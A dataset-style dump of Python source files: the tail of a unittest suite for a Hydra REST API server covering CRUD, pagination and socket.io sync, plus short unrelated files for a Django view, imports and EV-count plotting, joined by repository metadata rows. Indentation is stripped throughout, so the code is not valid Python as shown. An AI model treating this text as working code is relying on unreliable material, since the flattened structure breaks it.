def test_object_DELETE(self):
"""Test DELETE of a given object using ID."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_methods = [x.method for x in class_.supportedOperation]
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
initial_put_response = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert initial_put_response.status_code == 201
response = json.loads(
initial_put_response.data.decode('utf-8'))
regex = r'(.*)ID (.{36})* (.*)'
matchObj = re.match(regex, response["description"])
assert matchObj is not None
id_ = matchObj.group(2)
if "DELETE" in class_methods:
delete_response = self.client.delete(
'{}/{}'.format(endpoints[endpoint], id_))
assert delete_response.status_code == 200
def test_object_PUT_at_id(self):
"""Create object in collection using PUT at specific ID."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_methods = [x.method for x in class_.supportedOperation]
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
if "PUT" in class_methods:
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
put_response = self.client.put('{}/{}'.format(
endpoints[endpoint], uuid.uuid4()), data=json.dumps(dummy_object))
assert put_response.status_code == 201
def test_object_PUT_at_ids(self):
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_methods = [x.method for x in class_.supportedOperation]
data_ = {"data": list()}
objects = list()
ids = ""
for index in range(3):
objects.append(gen_dummy_object(
collection.class_.title, self.doc))
ids = "{},".format(uuid.uuid4())
data_["data"] = objects
if "PUT" in class_methods:
put_response = self.client.put(
'{}/add/{}'.format(endpoints[endpoint], ids),
data=json.dumps(data_))
assert put_response.status_code == 201
def test_endpointClass_PUT(self):
"""Check non collection Class PUT."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "PUT" in class_methods:
dummy_object = gen_dummy_object(class_.title, self.doc)
put_response = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert put_response.status_code == 201
def test_endpointClass_POST(self):
"""Check non collection Class POST."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "POST" in class_methods:
dummy_object = gen_dummy_object(class_.title, self.doc)
post_response = self.client.post(
endpoints[endpoint], data=json.dumps(dummy_object))
assert post_response.status_code == 200
def test_endpointClass_DELETE(self):
"""Check non collection Class DELETE."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "DELETE" in class_methods:
delete_response = self.client.delete(
endpoints[endpoint])
assert delete_response.status_code == 200
def test_endpointClass_GET(self):
"""Check non collection Class GET."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "GET" in class_methods:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "@context" in response_get_data
assert "@id" in response_get_data
assert "@type" in response_get_data
def test_IriTemplate(self):
"""Test structure of IriTemplates attached to collections"""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "search" in response_get_data
assert "mapping" in response_get_data["search"]
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_props = [x.prop for x in class_.supportedProperty]
for mapping in response_get_data["search"]["mapping"]:
if mapping["property"] not in ["limit", "offset", "pageIndex"]:
assert mapping["property"] in class_props
def test_client_controlled_pagination(self):
"""Test pagination controlled by client with help of pageIndex,
offset and limit parameters."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "search" in response_get_data
assert "mapping" in response_get_data["search"]
# Test with pageIndex and limit
params = {"pageIndex": 1, "limit": 2}
response_for_page_param = self.client.get(endpoints[endpoint], query_string=params)
assert response_for_page_param.status_code == 200
response_for_page_param_data = json.loads(
response_for_page_param.data.decode('utf-8'))
assert "first" in response_for_page_param_data["view"]
assert "last" in response_for_page_param_data["view"]
if "next" in response_for_page_param_data["view"]:
assert "pageIndex=2" in response_for_page_param_data["view"]["next"]
next_response = self.client.get(response_for_page_param_data["view"]["next"])
assert next_response.status_code == 200
next_response_data = json.loads(
next_response.data.decode('utf-8'))
assert "previous" in next_response_data["view"]
assert "pageIndex=1" in next_response_data["view"]["previous"]
# Test with offset and limit
params = {"offset": 1, "limit": 2}
response_for_offset_param = self.client.get(endpoints[endpoint],
query_string=params)
assert response_for_offset_param.status_code == 200
response_for_offset_param_data = json.loads(
response_for_offset_param.data.decode('utf-8'))
assert "first" in response_for_offset_param_data["view"]
assert "last" in response_for_offset_param_data["view"]
if "next" in response_for_offset_param_data["view"]:
assert "offset=3" in response_for_offset_param_data["view"]["next"]
next_response = self.client.get(
response_for_offset_param_data["view"]["next"])
assert next_response.status_code == 200
next_response_data = json.loads(
next_response.data.decode('utf-8'))
assert "previous" in next_response_data["view"]
assert "offset=1" in next_response_data["view"]["previous"]
def test_GET_for_nested_class(self):
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "GET" in class_methods:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
response_get_data = json.loads(
response_get.data.decode('utf-8'))
assert "@context" in response_get_data
assert "@id" in response_get_data
assert "@type" in response_get_data
class_props = [x for x in class_.supportedProperty]
for prop_name in class_props:
if isinstance(prop_name.prop, HydraLink) and prop_name.read is True:
nested_obj_resp = self.client.get(
response_get_data[prop_name.title])
assert nested_obj_resp.status_code == 200
nested_obj = json.loads(
nested_obj_resp.data.decode('utf-8'))
assert "@type" in nested_obj
elif "vocab:" in prop_name.prop:
assert "@type" in response_get_data[prop_name.title]
def test_required_props(self):
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "PUT" in class_methods:
dummy_object = gen_dummy_object(class_.title, self.doc)
required_prop = ""
for prop in class_.supportedProperty:
if prop.required:
required_prop = prop.title
break
if required_prop:
del dummy_object[required_prop]
put_response = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert put_response.status_code == 400
def test_writeable_props(self):
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "POST" in class_methods:
dummy_object = gen_dummy_object(class_.title, self.doc)
# Test for writeable properties
post_response = self.client.post(
endpoints[endpoint], data=json.dumps(dummy_object))
assert post_response.status_code == 200
# Test for properties with writeable=False
non_writeable_prop = ""
for prop in class_.supportedProperty:
if prop.write is False:
non_writeable_prop = prop.title
break
if non_writeable_prop != "":
dummy_object[non_writeable_prop] = "xyz"
post_response = self.client.post(
endpoints[endpoint], data=json.dumps(dummy_object))
assert post_response.status_code == 405
def test_readable_props(self):
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "GET" in class_methods:
not_readable_prop = ""
for prop in class_.supportedProperty:
if prop.read is False:
not_readable_prop = prop.title
break
if not_readable_prop:
get_response = self.client.get(
endpoints[endpoint])
get_response_data = json.loads(
get_response.data.decode('utf-8'))
assert not_readable_prop not in get_response_data
def test_bad_objects(self):
"""Checks if bad objects are added or not."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
bad_response_put = self.client.put(
endpoints[endpoint],
data=json.dumps(
dict(
foo='bar')))
assert bad_response_put.status_code == 400
def test_bad_requests(self):
"""Checks if bad requests are handled or not."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
collection = self.doc.collections[collection_name]["collection"]
class_ = self.doc.parsed_classes[collection.class_.title]["class"]
class_methods = [x.method for x in class_.supportedOperation]
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
initial_put_response = self.client.put(
endpoints[endpoint], data=json.dumps(dummy_object))
assert initial_put_response.status_code == 201
response = json.loads(
initial_put_response.data.decode('utf-8'))
regex = r'(.*)ID (.{36})* (.*)'
matchObj = re.match(regex, response["description"])
assert matchObj is not None
id_ = matchObj.group(2)
if "POST" not in class_methods:
dummy_object = gen_dummy_object(
collection.class_.title, self.doc)
post_replace_response = self.client.post(
'{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object))
assert post_replace_response.status_code == 405
if "DELETE" not in class_methods:
delete_response = self.client.delete(
'{}/{}'.format(endpoints[endpoint], id_))
assert delete_response.status_code == 405
def test_Endpoints_Contexts(self):
"""Test all endpoints contexts are generated properly."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
collection_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if collection_name in self.doc.collections:
response_get = self.client.get(endpoints[endpoint])
assert response_get.status_code == 200
context = json.loads(
response_get.data.decode('utf-8'))["@context"]
response_context = self.client.get(context)
response_context_data = json.loads(
response_context.data.decode('utf-8'))
assert response_context.status_code == 200
assert "@context" in response_context_data
class SocketTestCase(unittest.TestCase):
"""Test Class for socket events and operations."""
@classmethod
def setUpClass(self):
"""Database setup before the tests."""
print("Creating a temporary database...")
engine = create_engine('sqlite:///:memory:')
Base.metadata.create_all(engine)
session = scoped_session(sessionmaker(bind=engine))
self.session = session
self.API_NAME = "demoapi"
self.page_size = 1
self.HYDRUS_SERVER_URL = "http://hydrus.com/"
self.app = app_factory(self.API_NAME)
self.socketio = create_socket(self.app, self.session)
print("going for create doc")
self.doc = doc_maker.create_doc(
doc_writer_sample.api_doc.generate(),
self.HYDRUS_SERVER_URL,
self.API_NAME)
test_classes = doc_parse.get_classes(self.doc.generate())
test_properties = doc_parse.get_all_properties(test_classes)
doc_parse.insert_classes(test_classes, self.session)
doc_parse.insert_properties(test_properties, self.session)
print("Classes and properties added successfully.")
print("Setting up hydrus utilities... ")
self.api_name_util = set_api_name(self.app, self.API_NAME)
self.session_util = set_session(self.app, self.session)
self.doc_util = set_doc(self.app, self.doc)
self.page_size_util = set_page_size(self.app, self.page_size)
self.client = self.app.test_client()
self.socketio_client = self.socketio.test_client(self.app, namespace='/sync')
print("Creating utilities context... ")
self.api_name_util.__enter__()
self.session_util.__enter__()
self.doc_util.__enter__()
self.client.__enter__()
print("Setup done, running tests...")
@classmethod
def tearDownClass(self):
"""Tear down temporary database and exit utilities"""
self.client.__exit__(None, None, None)
self.doc_util.__exit__(None, None, None)
self.session_util.__exit__(None, None, None)
self.api_name_util.__exit__(None, None, None)
self.session.close()
def setUp(self):
for class_ in self.doc.parsed_classes:
class_title = self.doc.parsed_classes[class_]["class"].title
dummy_obj = gen_dummy_object(class_title, self.doc)
crud.insert(
dummy_obj,
id_=str(
uuid.uuid4()),
session=self.session)
# If it's a collection class then add an extra object so
# we can test pagination thoroughly.
if class_ in self.doc.collections:
crud.insert(
dummy_obj,
id_=str(
uuid.uuid4()),
session=self.session)
# Add two dummy modification records
crud.insert_modification_record(method="POST",
resource_url="", session=self.session)
crud.insert_modification_record(method="DELETE",
resource_url="", session=self.session)
def test_connect(self):
"""Test connect event."""
socket_client = self.socketio.test_client(self.app, namespace='/sync')
data = socket_client.get_received('/sync')
assert len(data) > 0
event = data[0]
assert event['name'] == 'connect'
last_job_id = crud.get_last_modification_job_id(self.session)
assert event['args'][0]['last_job_id'] == last_job_id
socket_client.disconnect(namespace='/sync')
def test_reconnect(self):
"""Test reconnect event."""
socket_client = self.socketio.test_client(self.app, namespace='/sync')
# Flush data of first connect event
socket_client.get_received('/sync')
# Client reconnects by emitting 'reconnect' event.
socket_client.emit('reconnect', namespace='/sync')
# Get update received on reconnecting to the server
data = socket_client.get_received('/sync')
assert len(data) > 0
# Extract the event information
event = data[0]
assert event['name'] == 'connect'
last_job_id = crud.get_last_modification_job_id(self.session)
# Check last job id with last_job_id received by client in the update.
assert event['args'][0]['last_job_id'] == last_job_id
socket_client.disconnect(namespace='/sync')
def test_modification_table_diff(self):
"""Test 'modification-table-diff' events."""
# Flush old received data at socket client
self.socketio_client.get_received('/sync')
# Set last_job_id as the agent_job_id
agent_job_id = crud.get_last_modification_job_id(self.session)
# Add an extra modification record newer than the agent_job_id
new_latest_job_id = crud.insert_modification_record(method="POST",
resource_url="", session=self.session)
self.socketio_client.emit('get_modification_table_diff',
{'agent_job_id': agent_job_id}, namespace='/sync')
data = self.socketio_client.get_received('/sync')
assert len(data) > 0
event = data[0]
assert event['name'] == 'modification_table_diff'
# Check received event contains data of newly added modification record.
assert event['args'][0][0]['method'] == "POST"
assert event['args'][0][0]['resource_url'] == ""
assert event['args'][0][0]['job_id'] == new_latest_job_id
def test_socketio_POST_updates(self):
"""Test 'update' event emitted by socketio for POST operations."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "POST" in class_methods:
dummy_object = gen_dummy_object(class_.title, self.doc)
# Flush old socketio updates
self.socketio_client.get_received('/sync')
post_response = self.client.post(
endpoints[endpoint], data=json.dumps(dummy_object))
assert post_response.status_code == 200
# Get new socketio update
update = self.socketio_client.get_received('/sync')
assert len(update) != 0
assert update[0]['args'][0]['method'] == "POST"
resource_name = update[0]['args'][0]['resource_url'].split('/')[-1]
assert resource_name == endpoints[endpoint].split('/')[-1]
def test_socketio_DELETE_updates(self):
"""Test 'update' event emitted by socketio for DELETE operations."""
index = self.client.get("/{}".format(self.API_NAME))
assert index.status_code == 200
endpoints = json.loads(index.data.decode('utf-8'))
for endpoint in endpoints:
if endpoint not in ["@context", "@id", "@type"]:
class_name = "/".join(endpoints[endpoint].split(
"/{}/".format(self.API_NAME))[1:])
if class_name not in self.doc.collections:
class_ = self.doc.parsed_classes[class_name]["class"]
class_methods = [
x.method for x in class_.supportedOperation]
if "DELETE" in class_methods:
# Flush old socketio updates
self.socketio_client.get_received('/sync')
delete_response = self.client.delete(
endpoints[endpoint])
assert delete_response.status_code == 200
# Get new update event
update = self.socketio_client.get_received('/sync')
assert len(update) != 0
assert update[0]['args'][0]['method'] == 'DELETE'
resource_name = update[0]['args'][0]['resource_url'].split('/')[-1]
assert resource_name == endpoints[endpoint].split('/')[-1]
if __name__ == '__main__':
message = """
Running tests for the app. Checking if all responses are in proper order.
"""
unittest.main()
| 51.929705 | 100 | 0.550696 | 4,889 | 45,802 | 4.929229 | 0.062589 | 0.02469 | 0.032864 | 0.040209 | 0.810573 | 0.770198 | 0.734802 | 0.716669 | 0.69368 | 0.677621 | 0 | 0.010773 | 0.343391 | 45,802 | 881 | 101 | 51.988649 | 0.79055 | 0.052356 | 0 | 0.710907 | 0 | 0 | 0.059831 | 0.003308 | 0 | 0 | 0 | 0 | 0.166886 | 1 | 0.045992 | false | 0 | 0.021025 | 0 | 0.070959 | 0.015769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4133e1bc42983ea66207a46d56f8271c574d0112 | 44 | py | Python | uvcgan/data/__init__.py | LS4GAN/uvcgan | 376439ae2a9be684ff279ddf634fe137aadc5df5 | [
"BSD-2-Clause"
] | 20 | 2022-02-14T22:36:19.000Z | 2022-03-29T06:31:30.000Z | uvcgan/data/__init__.py | LS4GAN/uvcgan | 376439ae2a9be684ff279ddf634fe137aadc5df5 | [
"BSD-2-Clause"
] | 1 | 2022-03-09T17:23:30.000Z | 2022-03-09T17:23:30.000Z | uvcgan/data/__init__.py | LS4GAN/uvcgan | 376439ae2a9be684ff279ddf634fe137aadc5df5 | [
"BSD-2-Clause"
] | 3 | 2022-02-14T22:36:41.000Z | 2022-03-20T12:53:29.000Z | from .data import get_data, load_datasets
| 14.666667 | 42 | 0.795455 | 7 | 44 | 4.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 2 | 43 | 22 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
418f11b9be6d33797039dbd61fb14d0926c37b30 | 109 | py | Python | study/views/articles.py | mekroket/Anchor | 8aa0d6bd27940f048774535bdccf3f8cc8d6c8e4 | [
"MIT"
] | null | null | null | study/views/articles.py | mekroket/Anchor | 8aa0d6bd27940f048774535bdccf3f8cc8d6c8e4 | [
"MIT"
] | null | null | null | study/views/articles.py | mekroket/Anchor | 8aa0d6bd27940f048774535bdccf3f8cc8d6c8e4 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def Makaleler(request):
return render(request,"pages/articles.html") | 27.25 | 48 | 0.788991 | 14 | 109 | 6.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110092 | 109 | 4 | 48 | 27.25 | 0.886598 | 0 | 0 | 0 | 0 | 0 | 0.172727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
ec3a4d36be57570d5bb7802f6d6731dc57dbad46 | 167 | py | Python | buildin_modules/pkg_practice/sample_import_pkg.py | Mason-Lin/python_playground | f6d3f194d48c94d43c0e416baa249755f4388bc9 | [
"MIT"
] | null | null | null | buildin_modules/pkg_practice/sample_import_pkg.py | Mason-Lin/python_playground | f6d3f194d48c94d43c0e416baa249755f4388bc9 | [
"MIT"
] | 4 | 2020-09-18T11:49:14.000Z | 2021-07-13T11:20:47.000Z | buildin_modules/pkg_practice/sample_import_pkg.py | Mason-Lin/python_playground | f6d3f194d48c94d43c0e416baa249755f4388bc9 | [
"MIT"
] | null | null | null | from sample_pkg.sample_module import sample_func
# from sample_pkg import sample_module
if __name__ == '__main__':
sample_func()
# sample_module.sample_func() | 27.833333 | 48 | 0.778443 | 23 | 167 | 4.956522 | 0.391304 | 0.315789 | 0.22807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143713 | 167 | 6 | 49 | 27.833333 | 0.797203 | 0.383234 | 0 | 0 | 0 | 0 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ec3aad6e683ba1b1a032379b499034e2db78a870 | 3,660 | py | Python | modelling/F1_plot_functions.py | ClimateSubak/EV-forecasting | 941de21da95b36445dd794f3e13cf8193f7b15fd | [
"MIT"
] | 5 | 2021-07-18T16:44:53.000Z | 2022-03-21T09:37:08.000Z | modelling/F1_plot_functions.py | ClimateSubak/EV-forecasting | 941de21da95b36445dd794f3e13cf8193f7b15fd | [
"MIT"
] | null | null | null | modelling/F1_plot_functions.py | ClimateSubak/EV-forecasting | 941de21da95b36445dd794f3e13cf8193f7b15fd | [
"MIT"
] | null | null | null | import pandas as pd
import geopandas as gpd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
def plot_single_msoa(y_train, y_test, y_pred,msoa):
# Map Y-pred array to a dataframe with consistent indices to test set
df_pred = pd.DataFrame(index=y_test.index)
df_pred['ev_count'] = y_pred
df_pred.head()
fig, ax = plt.subplots(figsize=(10,5))
ax.plot(y_train.loc[msoa,:], color='k', label='Train')
ax.plot(y_test.loc[msoa,:], color='b', label='Test')
ax.plot(df_pred.loc[msoa,:], color='b', linestyle=':',label='Predicted')
ax.set_xlabel('Date')
ax.set_ylabel('EV Count')
plt.xticks([min(y_train.loc[msoa,:].index),
max(y_train.loc[msoa,:].index),
max(y_test.loc[msoa,:].index)],
rotation=45)
plt.axvline(x=max(y_train.loc[msoa,:].index), color='k', linestyle='--')
plt.legend()
return ax
def plot_dated_evdist(y_test, y_pred, msoas, date):
idx = pd.IndexSlice
# Map Y-pred array to a dataframe with consistent indices to test set
df_pred = pd.DataFrame(index=y_test.index)
df_pred['ev_count'] = y_pred
ax = sns.distplot(df_pred.loc[idx[msoas,date,:]]['ev_count'],
hist_kws={
'rwidth': 0.85,
'edgecolor': 'black',
'alpha': 0.2}, label='Predicted')
ax = sns.distplot(y_test.loc[idx[msoas,:]]['ev_count'],
hist_kws={
'rwidth': 0.85,
'edgecolor': 'black',
'alpha': 0.2},
label='Test')
ax.set_title('Nonzero EV Distribution')
plt.legend()
return ax
def plot_steady_evdist(y_test, y_pred, msoas):
df_pred = pd.DataFrame(index=y_test.index)
df_pred['ev_count'] = y_pred
ax = sns.distplot(df_pred.loc[msoas]['ev_count'],
hist_kws={
'rwidth': 0.85,
'edgecolor': 'black',
'alpha': 0.2}, label='Predicted')
ax = sns.distplot(y_test.loc[msoas]['ev_count'],
hist_kws={
'rwidth': 0.85,
'edgecolor': 'black',
'alpha': 0.2},
label='Test')
ax.set_title('Nonzero EV Distribution')
plt.legend()
return ax
def plot_single_msoa_train_val_test(y_train, y_val, y_test, y_pred_test, y_pred_val, msoa):
# Map Y-pred array to a dataframe with consistent indices to test set
df_pred_test = pd.DataFrame(index=y_test.index)
df_pred_test['ev_count'] = y_pred_test
df_pred_test.head()
# Map Y-pred array to a dataframe with consistent indices to test set
df_pred_val = pd.DataFrame(index=y_val.index)
df_pred_val['ev_count'] = y_pred_val
df_pred_val.head()
fig, ax = plt.subplots(figsize=(10,5))
ax.plot(y_train.loc[msoa,:], color='k', label='Train')
ax.plot(y_val.loc[msoa,:], color='k',linestyle='-', label='Validation')
ax.plot(df_pred_val.loc[msoa,:], color='b', linestyle=':',label='Predicted (val)')
ax.plot(y_test.loc[msoa,:], color='b', label='Test')
ax.plot(df_pred_test.loc[msoa,:], color='b', linestyle=':',label='Predicted (test)')
ax.set_xlabel('Date')
ax.set_ylabel('EV Count')
plt.xticks([min(y_train.loc[msoa,:].index),
max(y_train.loc[msoa,:].index),
max(y_val.loc[msoa,:].index),
max(y_test.loc[msoa,:].index)],
rotation=45)
plt.axvline(x=max(y_train.loc[msoa,:].index), color='k', linestyle='--')
plt.axvline(x=max(y_val.loc[msoa,:].index), color='k', linestyle='--')
plt.legend()
return ax | 34.205607 | 91 | 0.589344 | 534 | 3,660 | 3.853933 | 0.151685 | 0.052478 | 0.058309 | 0.050535 | 0.808066 | 0.802235 | 0.773567 | 0.721088 | 0.705539 | 0.705539 | 0 | 0.010889 | 0.247268 | 3,660 | 107 | 92 | 34.205607 | 0.736116 | 0.075137 | 0 | 0.666667 | 0 | 0 | 0.10559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0 | 0.061728 | 0 | 0.160494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ec3cfdc4a45d8823fdeaf065d1e72478073a10a4 | 36 | py | Python | Basics/largest-in-an-array.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Basics/largest-in-an-array.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Basics/largest-in-an-array.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | a = [5, 6, 8, 2, 3]
print(max(a))
| 12 | 20 | 0.416667 | 9 | 36 | 1.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 0.277778 | 36 | 2 | 21 | 18 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
